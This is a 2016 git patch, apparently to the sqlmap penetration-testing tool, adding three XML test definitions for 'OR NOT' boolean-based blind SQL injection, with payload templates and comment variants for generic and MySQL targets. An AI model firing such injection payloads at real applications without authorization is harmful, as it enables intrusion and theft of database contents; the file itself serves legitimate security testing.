From df8e4b504de07b6c83dd6790656e8faf3a5233fa Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 14 Jan 2016 13:51:30 +0100
Subject: [PATCH] Patch for special cases of OR boolean-based blind (covered
 with last two commits)

---
 xml/payloads/01_boolean_blind.xml | 53 +++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)

diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
index f10f65c9b..386e167f4 100644
--- a/xml/payloads/01_boolean_blind.xml
+++ b/xml/payloads/01_boolean_blind.xml
@@ -186,6 +186,22 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR NOT [INFERENCE]</vector>
+        <request>
+            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
         <stype>1</stype>
@@ -220,6 +236,23 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR NOT [INFERENCE]</vector>
+        <request>
+            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
+            <comment>-- -</comment>
+        </request>
+        <response>
+            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
         <stype>1</stype>
@@ -260,6 +293,26 @@ Tag: <test>
         </details>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR NOT [INFERENCE]</vector>
+        <request>
+            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
         <stype>1</stype>